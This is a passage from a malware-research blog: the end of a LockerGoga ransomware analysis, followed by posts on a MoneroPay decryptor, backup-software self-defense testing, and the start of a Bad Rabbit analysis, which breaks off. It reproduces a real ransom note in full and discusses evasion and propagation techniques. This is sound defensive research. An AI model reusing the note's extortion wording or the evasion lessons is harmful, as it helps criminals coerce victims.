<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="346" src="https://lh4.googleusercontent.com/epB63SqVp1EBHjH7CLgMKDONfmfuzH1TudZSCabD-fJPgonuAvplR0tMH3EzuCKOVg3c_NtON5zID0i53eyHKTn0Y-wFLqteg0Uo-LcXe1m-Kr9h_NBzcpnIz-yoEOjjlX4SWzyC" style="border: none; transform: rotate(0rad);" width="561" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
Once encrypted, the footer is stored to the end of the encrypted file.<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="563" src="https://lh3.googleusercontent.com/F0o1xrTd28PThKVTblYPPHgMrnnch6hFD3cMEoDT5NHVrdpAn06DveWN7t0rl0N4znY1jwu4LukZG4G8oUSpcT4hhXalY6IZ8qcKaxA7XfA3T_kPMe5bKx84Edp_C2YzWdKWVn_F" style="border: none; transform: rotate(0rad);" width="547" /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><br /></span></div>
The low public exponent value (e=17) is mitigated by the OAEP randomizing padding scheme that can be identified by a different footer’s ciphertext appearing while a plaintext and public key are the same.<br />
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="396" src="https://lh4.googleusercontent.com/Imb4m2dFh4ZIQJ06ZkxyOqv-Z1kGwpONi0g7zz-C6R6I7ubwl2SuEz34R4Rrco3V__rqYY-UXx3-_O-JFzp6DkvarRpxEHv5TLw69iKErL6wtVFuEzCj8oF2x__-tgOAaZ14LTo8" style="border: none; transform: rotate(0rad);" width="624" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<h3 style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;">
<span style="color: #434343; font-family: "arial"; font-size: 14pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Ransom note</span></h3>
<br />
Once files are encrypted, the locker leaves the ransom note in 'README_LOCKED.txt' file:<br />
<blockquote class="tr_bq">
<span style="color: blue;"><i>Greetings!</i></span><br />
<span style="color: blue;"><i><br /></i></span>
<span style="color: blue;"><i>There was a significant flaw in the security system of your company.</i></span><br />
<span style="color: blue;"><i>You should be thankful that the flaw was exploited by serious people and not some rookies.</i></span><br />
<span style="color: blue;"><i>They would have damaged all of your data by mistake or for fun.</i></span><br />
<span style="color: blue;"><i><br /></i></span>
<span style="color: blue;"><i>Your files are encrypted with the strongest military algorithms RSA4096 and AES-256.</i></span><br />
<span style="color: blue;"><i>Without our special decoder it is impossible to restore the data. </i></span><br />
<span style="color: blue;"><i>Attempts to restore your data with third party software as Photorec, RannohDecryptor etc.</i></span><br />
<span style="color: blue;"><i>will lead to irreversible destruction of your data.</i></span><br />
<span style="color: blue;"><i><br /></i></span>
<span style="color: blue;"><i>To confirm our honest intentions.</i></span><br />
<span style="color: blue;"><i>Send us 2-3 different random files and you will get them decrypted.</i></span><br />
<span style="color: blue;"><i>It can be from different computers on your network to be sure that our decoder decrypts everything.</i></span><br />
<span style="color: blue;"><i>Sample files we unlock for free (files should not be related to any kind of backups).</i></span><br />
<span style="color: blue;"><i><br /></i></span>
<span style="color: blue;"><i>We exclusively have decryption software for your situation</i></span><br />
<span style="color: blue;"><i><br /></i></span>
<span style="color: blue;"><i>DO NOT RESET OR SHUTDOWN - files may be damaged.</i></span><br />
<span style="color: blue;"><i>DO NOT RENAME the encrypted files.</i></span><br />
<span style="color: blue;"><i>DO NOT MOVE the encrypted files.</i></span><br />
<span style="color: blue;"><i>This may lead to the impossibility of recovery of the certain files.</i></span><br />
<span style="color: blue;"><i><br /></i></span>
<span style="color: blue;"><i>The payment has to be made in Bitcoins.</i></span><br />
<span style="color: blue;"><i>The final price depends on how fast you contact us.</i></span><br />
<span style="color: blue;"><i>As soon as we receive the payment you will get the decryption tool and</i></span><br />
<span style="color: blue;"><i>instructions on how to improve your systems security</i></span><br />
<span style="color: blue;"><i><br /></i></span>
<span style="color: blue;"><i>To get information on the price of the decoder contact us at:</i></span><br />
<span style="color: blue;"><i>SuzuMcpherson@protonmail.com</i></span><br />
<span style="color: blue;"><i>AsuxidOruraep1999@o2.pl</i></span><br />
<div>
<br /></div>
</blockquote>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "arial"; font-size: 16pt; white-space: pre;">Decryption</span></div>
<br />
In general case, it is not possible to decrypt the affected files without the master private key. However, if you have a memory dump that was taken while the worker was encrypting a file, you can decrypt this particular file. The file path and corresponding AES key and IV can be found in the memory dump by searching ‘GOGA<VERSION_ID>’ and ‘goga’ strings.<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="228" src="https://lh5.googleusercontent.com/7SpW4neDetMimsmpkqXTcF7mRZhwm6R-Mx6qf3oALMZicbbpbOXPjPhixE9Cf6pcFntFgRIcgFsD_CS4YbYz8MBkvMzbHB1k7JfE5yMYrxdFl6EvfMJPZiQJlZ5cVQ8WZdvlMCIX" style="border: none; transform: rotate(0rad);" width="542" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
To decrypt an encrypted file for which you have located the key and IV in the memory dump:<br />
<ol style="text-align: left;">
<li>Make a backup copy of the encrypted file.</li>
<li>Delete the footer (last 148 bytes) from the encrypted file.</li>
<li>Decrypt the encrypted file using any cryptographic tool. For example, to decrypt the file encrypted with the key and IV shown on the picture above, run:</li>
</ol>
<blockquote class="tr_bq" style="text-align: left;">
<i>$ openssl aes-128-ctr -d -in chs_boot.ttf.locked_nofooter -K F12D893D2B9E8CC639C2EE3B06617AAC -iv 44C5A7A5FBF58C0C91D16E075B130070 -out chs_boot.ttf</i></blockquote>
<br />
<span style="font-family: "arial"; font-size: 16pt; white-space: pre;">Conclusion</span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<br />
The LockerGoga breaks the patterns in ransomware development. First, it showed that malware does not need obfuscation, packing, and runtime encryption to successfully attack an organization. A digital certificate is a much more effective weapon in this regard. On the contrary, employing the conventional self-defense techniques may have an opposite effect, for example, high entropy can attract unnecessary attention from the antivirus heuristics.<br />
<br />
Second, despite, hardcoded crypto functions and libraries have been already used by TeslaCrypt, MoneroPay, GlobeImposter, Locky ransomware for many years, static linking of the Crypto++ and Boost libraries, for which disassemblers have no signatures, complicates reverse engineering and obfuscate the execution flow. We discussed the problem of finding embedded crypto primitives in ransomware last year at <a href="https://www.virusbulletin.com/conference/vb2018/abstracts/artificial-intelligence-assist-ransomware-cryptanalysis">VB2018</a>.<br />
<br />
Third, LockerGoga cares about performance. The multithreading in ransomware was first seen in <a href="https://www.nioguard.com/2015/09/teslacrypt-21-analysis-cracking-ping.html">TeslaCrypt 2.0</a> where different threads were responsible for killing the processes of the analysis tools, searching and encrypting files, and C&C communication. Here, the cryptolocker leverages multiprocessing and task distribution. Also, Crypto++ AES implementation enables AES-NI to improve the speed of AES encryption. Moreover, the low value of public exponent (e=17 instead of standard e=65537) improves the performance of RSA cipher and being balanced by the randomized padding OAEP does not significantly increase security risks (read more about attacks on RSA <a href="https://crypto.stanford.edu/~dabo/pubs/papers/RSA-survey.pdf">https://crypto.stanford.edu/~dabo/pubs/papers/RSA-survey.pdf</a> by Dan Boneh).<br />
<br />
UPDATE:<br />
<br />
Reversing LockerGoga video tutorial on YouTube:<br />
<br />
<ul style="text-align: left;">
<li><a href="https://www.youtube.com/watch?v=KhMdZZD_-Ec">Part 1. Debugging a process chain.</a></li>
<li><a href="https://www.youtube.com/watch?v=76CSdCCCunU">Part 2. Finding encryption algorithms.</a></li>
<li><a href="https://www.youtube.com/watch?v=tmd2azAsNuo">Part 3. File encryption and decryption.</a></li>
</ul>
<br />
<span style="font-family: "arial"; font-size: 16pt; white-space: pre;">See also</span></div>
<ol style="text-align: left;">
<li><a href="https://motherboard.vice.com/amp/en_us/article/8xyj7g/ransomware-forces-two-chemical-companies-to-order-hundreds-of-new-computers">https://motherboard.vice.com/amp/en_us/article/8xyj7g/ransomware-forces-two-chemical-companies-to-order-hundreds-of-new-computers</a> </li>
<li><a href="https://www.forcepoint.com/blog/security-labs/lockergoga-ransomware-how-it-works">https://www.forcepoint.com/blog/security-labs/lockergoga-ransomware-how-it-works</a> </li>
<li><a href="https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/">https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/</a> </li>
<li><a href="https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/">https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/</a> </li>
<li><a href="https://blog.talosintelligence.com/2019/03/lockergoga.html">https://blog.talosintelligence.com/2019/03/lockergoga.html</a> </li>
<li><a href="http://id-ransomware.blogspot.com/2019/01/lockergoga-worker32-ransomware.html">http://id-ransomware.blogspot.com/2019/01/lockergoga-worker32-ransomware.html</a> </li>
<li><a href="https://crypto.stanford.edu/~dabo/pubs/papers/RSA-survey.pdf">https://crypto.stanford.edu/~dabo/pubs/papers/RSA-survey.pdf</a> </li>
<li><a href="https://twitter.com/malwrhunterteam/status/1104082562216062978">https://twitter.com/malwrhunterteam/status/1104082562216062978</a></li>
<li><a href="https://www.joesecurity.org/blog/2995389471535835488">https://www.joesecurity.org/blog/2995389471535835488</a> </li>
<li><a href="https://app.any.run/tasks/3f1a7f92-0b43-497b-a17f-d5d31ff55228">https://app.any.run/tasks/3f1a7f92-0b43-497b-a17f-d5d31ff55228</a></li>
<li><a href="https://labsblog.f-secure.com/2019/03/27/analysis-of-lockergoga-ransomware/%C2%A0" target="_blank">https://labsblog.f-secure.com/2019/03/27/analysis-of-lockergoga-ransomware/ </a></li>
<li><a href="https://www.mcafee.com/enterprise/en-us/threat-center/threat-landscape-dashboard/ransomware-details.lockergoga-ransomware.html">https://www.mcafee.com/enterprise/en-us/threat-center/threat-landscape-dashboard/ransomware-details.lockergoga-ransomware.html</a></li>
<li><a href="https://labsblog.f-secure.com/2019/03/27/analysis-of-lockergoga-ransomware/">https://labsblog.f-secure.com/2019/03/27/analysis-of-lockergoga-ransomware/</a></li>
</ol>
</div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-40195763760631965012018-07-31T07:48:00.000-07:002020-01-22T04:33:20.650-08:00VB2018: Artificial intelligence to assist with ransomware cryptanalysis<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPKFBFuDo6AMSwZxCepIKvT8V7QQ3mZgEB-qs41bLxhtIjxCN5Gu4D5Bvipfqifso8Vlzts6NbHn8OpRc_x6oyhNrF4GEZ0roeB9Uunw7MOSOWd9ddn4BkLX7VecDJDoHnkQpwD2KdkFg8/s1600/crypto_code_vb2018logo2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="488" data-original-width="646" height="483" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPKFBFuDo6AMSwZxCepIKvT8V7QQ3mZgEB-qs41bLxhtIjxCN5Gu4D5Bvipfqifso8Vlzts6NbHn8OpRc_x6oyhNrF4GEZ0roeB9Uunw7MOSOWd9ddn4BkLX7VecDJDoHnkQpwD2KdkFg8/s640/crypto_code_vb2018logo2.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
It's always very exciting for me to be able to attend and, moreover, speak at the <a href="https://www.virusbulletin.com/conference/vb2018">Virus Bulletin Conference</a>. Because, it is the oldest and the most respectful antivirus conference that has been running since 1991 where cybersecurity experts from academia and industry gather to share their ideas, research, and forecasts. You can meet the researches who helped to boost the antivirus industry decades ago and are now the core of the antivirus community.<br />
<br />
This year in Montreal, we'll present an academic research conducted by my master student Kateryna Vitiuk under my supervision and devoted to <a href="https://www.virusbulletin.com/conference/vb2018/abstracts/artificial-intelligence-assist-ransomware-cryptanalysis">Cryptanalysis of ransomware with the help of Artificial Intelligence</a>.<br />
<br />
When analyzing ransomware, we often see the hardcoded implementation of the AES, RC4, Salsa20 algorithms, for example in <a href="https://www.nioguard.com/2015/09/teslacrypt-21-analysis-cracking-ping.html">TeslaCrypt</a>, <a href="https://www.acronis.com/en-us/blog/posts/locky-empire-strikes-back">Locky</a>, <a href="https://www.fortinet.com/blog/threat-research/analysis-of-new-globeimposter-ransomware-variant.html">GlobeImposter</a>, <a href="https://nioguard.blogspot.com/2018/02/decryptor-for-moneropay-ransomware.html">MoneroPay</a> ransomware. The ciphers' code can be poorly detected in the ransomware's memory dumps using the signature-based approach using Krypto ANALyzer (KANAL) for <a href="http://peid.has.it/">PEiD</a> tool and publicly available <a href="https://github.com/VirusTotal/yara">Yara</a> rules. Therefore, we assumed that it is possible to use the smart pattern matching method to find the known crypto primitives in the ransomware's disassembled code.<br />
<br />
<u>See also:</u><br />
<a href="https://www.virusbulletin.com/conference/vb2018/abstracts/artificial-intelligence-assist-ransomware-cryptanalysis">https://www.virusbulletin.com/conference/vb2018/abstracts/artificial-intelligence-assist-ransomware-cryptanalysis</a></div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-44375243524400813042018-03-21T07:14:00.000-07:002019-05-05T11:47:58.267-07:00Corporate Backup Solutions Self-Defense Test - March 2018<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh7twYwOpc-1tPK3NKYVtpoi4_I5lb3KQ5iOtvsBuKnKQTH6-KbIaYgTZ21JpGrrolTGM1lmd_5Mo0cGjnwpTQADH9qvUce06B0Zd5EadKuCoTfGcPdMvvwHq7Nz9gRV2f2_seRhQoD0pJ/s1600/self_defense_test.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="750" data-original-width="1316" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh7twYwOpc-1tPK3NKYVtpoi4_I5lb3KQ5iOtvsBuKnKQTH6-KbIaYgTZ21JpGrrolTGM1lmd_5Mo0cGjnwpTQADH9qvUce06B0Zd5EadKuCoTfGcPdMvvwHq7Nz9gRV2f2_seRhQoD0pJ/s640/self_defense_test.png" width="640" /></a></div>
<br />
In the light of the growing number of ransomware attacks in which cryptolockers terminate database processes to unlock the database files for encryption (Cerber, GlobeImposter, Rapid, Serpent) and can encrypt local and network backups to demand a ransom (Rapid, Spora), we decided to test self-defense capabilities of the top backup solutions used in business environments available for trial.<br />
<div>
<br /></div>
<div>
The test aims at testing the sustainability of product’s processes and services against typical attacks to security software described below, as well as self-protection of local backup and product’s files. Ransomware can encrypt local backup files and configuration files that belong to a backup program thereby disabling the recovery of the files. Moreover, once access to agent’s or server’s processes is gained, an attacker can delete backup copies of the files not only locally, but also in the cloud on behalf of a backup solution.</div>
<div>
<br />
See the full report by the <a href="https://github.com/AlexanderAda/NioGuardSecurityLab/blob/master/Test%20Reports/Corporate%20Backup%20Solutions%20Self-Defense%20Test%20-%20March%202018.pdf" target="_blank">link</a>.</div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-12473304687111008272018-02-04T09:21:00.000-08:002018-03-03T04:32:37.601-08:00Decryptor for MoneroPay Ransomware<div style="text-align: center;">
<span id="docs-internal-guid-d1ae88c3-5bae-1b1f-c1df-657161844f2c"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="455" src="https://lh6.googleusercontent.com/ttlWx6y_t1UsOESjBfpsj9uoS6xKwbWz4lWAsh0E00ksZCnOSzaXP5zeaeg4TUX2U_n5ryJz5wMvD92PNm-8Keuxsbe0aBPTV3608J7V3MyaOL-HIg6Am6UJFdEF7t6eq5SRYU81" style="border: none; transform: rotate(0rad);" width="602" /></span></span></div>
<br />
After analysis of the MoneroPay ransomware (MD5: <a href="https://www.virustotal.com/#/file/ababb37a65af7c8bde0167df101812ca96275c8bc367ee194c61ef3715228ddc/">14ea53020b4d0cb5acbea0bf2207f3f6</a>), we managed to patch the binary to turn it into a decryptor.<br />
<br />
<a name='more'></a><br />
The ransomware and password stealer in one application detected as 'MoneroPay' impersonates itself as the SpriteCoin cryptocurrency. The fraud was discovered by <a href="https://twitter.com/malwrhunterteam/status/952259308099653637">MalwareHunterTeam</a> on January 13, 2018.<br />
<br />
The ransomware uses the <a href="https://en.wikipedia.org/wiki/Salsa20">Salsa20</a> crypto algorithm to encrypt files. The MoneroPay generates 128-bit key based on C&C address ‘jmqapf3nflatei35.onion’, %COMPUTERNAME%, %USERNAME%, and %USERPROFILE% strings. Therefore, it is essential to run the MoneroPay decryptor on the same computer from where the files have been encrypted.<br />
<br />
<b>To decrypt the files encrypted by MoneroPay ransomware:</b><br />
<br />
<span style="color: red;"><u>Caution</u>: Use the decryptor at your own risk. We are not responsible for any damage that it may cause.</span><br />
<ol>
<li>Backup the encrypted files that have the extension ‘.encrypted’ before decryption.</li>
<br />
<li>Download the archive that contains the decryptor from the GitHub repository: <br /><a href="https://github.com/AlexanderAda/Ransomware-Decryptors/tree/master/MoneroPay">https://github.com/AlexanderAda/Ransomware-Decryptors/tree/master/MoneroPay</a> </li>
<br />
<li>Unpack the archive using the password ‘infected’.</li>
<br />
<ul><i><u>Note</u>: The decryptor is the patched version of the cryptolocker and can be still detected as the MoneroPay ransomware by your antivirus.</i><i><ul><i><br /></i></ul>
</i>
</ul>
<li>Run the decryptor ‘spritecoind_decryptor.exe’ (MD5: 3749d56abd58dff3d248b91b24da76d7) on an infected computer.</li>
<br />
<ol>
<li>Once executed, the decryptor shows the message to notify you about starting the decryption process.</li>
<span id="docs-internal-guid-d1ae88c3-5bba-afc9-ad83-9a9dbdb4b383"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="154" src="https://lh3.googleusercontent.com/VJ49URdILwhdIdt4PeQekBY781vnaaPrVfMQJdccRNMh_aHrG5cv6MDz8-o8oOFyn4lVRm6qSgUpywZtLB5tUJCrOSuQcBtizrOPdwCdxNOCpowJBu9KrppTSnliP4NQQLIX41PR" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="403" /></span></span><span id="docs-internal-guid-d1ae88c3-5bba-afc9-ad83-9a9dbdb4b383"><ol></ol>
</span><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span>
<li>After successful decryption, it shows the message with the status ‘Done’.</li>
<span id="docs-internal-guid-d1ae88c3-5bba-eb54-33a0-4022ac9f41dc"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="128" src="https://lh6.googleusercontent.com/CT7zwiKYVbRXtQ7gGNTDECZUXhtbY2LuioOCcwrrO2vOUOQMWCMCmOP5Vl7mz171InOK2QYrFkdvdWhllbMKMKTFXEwpKvpH04OSpIll_O6kPEqr7jOvNZwmZUNxhq5qX6g476Nl" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="119" /></span></span><br />
</ol>
</ol>
<br />
<b>To clean up the computer that was previously infected by the MoneroPay ransomware:</b><br />
<ol>
<li>Delete the ‘MoneroPay’ autorun reference in the Windows System Registry:<i><br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]</i></li>
<i>'MoneroPay' = 'C:\Users\<USER>\AppData\Roaming\MoneroPayAgent.exe'</i> <br />
<br />
<li>Delete the ransomware file:<br /><br />
<i>C:\Users\<USER>\AppData\Roaming\MoneroPayAgent.exe</i></li>
</ol>
<br />
Should you have any questions, please email to: ada (at) nioguard.com<br />
<br />
<b>References</b><br />
<ul>
<li><a href="https://www.acronis.com/en-us/blog/posts/spritecoin-new-ransomware-not-cryptocurrency">https://www.acronis.com/en-us/blog/posts/spritecoin-new-ransomware-not-cryptocurrency</a> </li>
<li><a href="https://www.fortinet.com/blog/threat-research/spritecoin-another-new-cryptocurrency-or-not.html">https://www.fortinet.com/blog/threat-research/spritecoin-another-new-cryptocurrency-or-not.html </a></li>
<li><a href="https://www.bleepingcomputer.com/news/security/moneropay-ransomware-disguised-as-wallet-for-fake-spritecoin-cryptocurrency/">https://www.bleepingcomputer.com/news/security/moneropay-ransomware-disguised-as-wallet-for-fake-spritecoin-cryptocurrency/</a> </li>
<li><a href="http://id-ransomware.blogspot.com/2018/01/moneropay-ransomware.html">http://id-ransomware.blogspot.com/2018/01/moneropay-ransomware.html</a></li>
<li><a href="https://sensorstechforum.com/remove-moneropay-virus-spritecoin-restore-encrypted-files/">https://sensorstechforum.com/remove-moneropay-virus-spritecoin-restore-encrypted-files/</a></li>
</ul>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com2tag:blogger.com,1999:blog-4482404627541610819.post-41625875089799160312017-12-22T02:35:00.002-08:002018-03-02T14:18:44.238-08:00VB2017 videos on attacks against Ukraine<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.virusbulletin.com/files/2914/7626/6965/VB2017-325w.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div style="background-color: white; box-sizing: border-box; color: #555555; font-family: "Source Sans Pro", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; margin-bottom: 10px;">
<div style="box-sizing: border-box; margin-bottom: 10px;">
<span style="background-color: #f5f8fa; color: #14171a; font-family: "segoe ui" , "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;">Thanks to Virus Bulletin for giving a chance to talk about the most destructive attacks this year.</span></div>
<blockquote class="tr_bq" style="box-sizing: border-box; margin-bottom: 10px;">
"(In)security is a global problem that affects every country in the world, but in recent years, none has been as badly hit as Ukraine.The most well known malware that affected the country is (Not)Petya, a ransomware/wiper threat that had global impact (it cost shipping firm <em style="box-sizing: border-box;">Maersk</em> alone <a href="http://www.zdnet.com/article/petya-ransomware-cyber-attack-costs-could-hit-300m-for-shipping-giant-maersk/" style="background: transparent; box-sizing: border-box; color: #006633; font-weight: 600;" target="_blank">$300m in lost revenues</a>), but which hit Ukrainian businesses particularly hard. The malware spread through a compromised update pushed out by <em style="box-sizing: border-box;">M.E.Doc</em>'s tax accounting software, which is popular in the country.<br />
In a VB2017 presentation, <em style="box-sizing: border-box;">NioGuard</em>'s Alexander Adamov, himself based in Ukraine, discussed how (Not)Petya and related attacks worked and what impact they had. We have now uploaded the video of his presentation to our <em style="box-sizing: border-box;">YouTube</em> channel."</blockquote>
<div style="text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/8WiIUmocmSI/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/8WiIUmocmSI?feature=player_embedded" width="480"></iframe></div>
</div>
<div style="background-color: white; box-sizing: border-box; color: #555555; font-family: "Source Sans Pro", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; margin-bottom: 10px;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.virusbulletin.com/files/2914/7626/6965/VB2017-325w.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
Read more:</div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="color: #555555; font-family: "source sans pro" , "helvetica neue" , "helvetica" , "arial" , sans-serif;"><a href="https://www.virusbulletin.com/blog/2017/12/vb2017-videos-attacks-against-ukraine/">https://www.virusbulletin.com/blog/2017/12/vb2017-videos-attacks-against-ukraine/</a></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitl81dpruwRNA2wkOVkgRCnwRf1wGiUhqTpxIdZZQNe34gHTBpooNeQKMKqigmnh-Ks2xwDIVbGeICpRAAOlUK2jx9to3XBIZl9VD_lQih_OstMEvfhMDnKQF7I0gemxk1NunBRSJ53IMz/s1600/vb2017_speakers.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="642" data-original-width="1448" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitl81dpruwRNA2wkOVkgRCnwRf1wGiUhqTpxIdZZQNe34gHTBpooNeQKMKqigmnh-Ks2xwDIVbGeICpRAAOlUK2jx9to3XBIZl9VD_lQih_OstMEvfhMDnKQF7I0gemxk1NunBRSJ53IMz/s640/vb2017_speakers.jpg" width="640" /></a></div>
<br /></div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-24761068647386612202017-10-27T06:37:00.000-07:002017-10-28T01:58:21.438-07:00Bad Rabbit Ransomware or Evolution of NotPetya<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs0cErgISh7zLepLVGe50mhVA2yGqQiV6PH9X3uXBjDONX1ivit12csHeLhEJAT8xQEldlaYsbup68XjIkwC2r9ht-4tpRnO10Ue7fxqYFGAnyUc3mQSrZLKwp5NRpql4AytBcrhqQP1Cw/s1600/badrabbit_countdown_crop.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="635" data-original-width="1192" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs0cErgISh7zLepLVGe50mhVA2yGqQiV6PH9X3uXBjDONX1ivit12csHeLhEJAT8xQEldlaYsbup68XjIkwC2r9ht-4tpRnO10Ue7fxqYFGAnyUc3mQSrZLKwp5NRpql4AytBcrhqQP1Cw/s640/badrabbit_countdown_crop.png" width="640" /></a></div>
<b id="docs-internal-guid-c5aa4db3-5e01-d329-0feb-b5b8e4392949" style="font-weight: normal;"><br /></b> <span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">BadRabbit launched on the morning of Tuesday, October 24, </span>2017<span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;"> was delivered through drive-by downloads of the fake Adobe Flash Player installer from the hacked websites. The installer came undetected with a Symantec digital certificate and 1 out of 65 detection rate on VirusTotal. The Bad Rabbit ransomware having the similar set of features and code snippets to the NotPetya wiper can be considered like its new version supposedly created by the same author. In the new version, the legitimate DiskCryptor driver used to install the bootloader and encrypt the hard disk volumes in a hidden way.</span><br />
<br />
<span style="background-color: white; color: #1d2129; font-family: "helvetica" , "arial" , sans-serif; font-size: 14px;">Main outcomes:</span><br />
<ul>
<li>The BadRabbit is a new version of NotPetya, supposedly written by the same author;</li>
<li>It's a cryptolocker - you can unlock the computer and decrypt the data only by paying 0.05 BTC;</li>
<li>This is not a targeted attack, unlike NotPetya</li>
<li>The BadRabbit is distributed over the local network using the EternalRomance vulnerability in SMB1, WMI, WebDAV, brute-force with simple passwords through NTLMSSP</li>
<li>The BadRabbit uses the legitimate DiskCryptor driver</li>
</ul>
Read the full report for more details.<br />
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><a name='more'></a></span></h2>
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Installation</span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The installer’s description says it is an Adobe Flash Player Installer/Uninstaller (MD5: fbbdc39af1139aebba4da004475e8839).</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
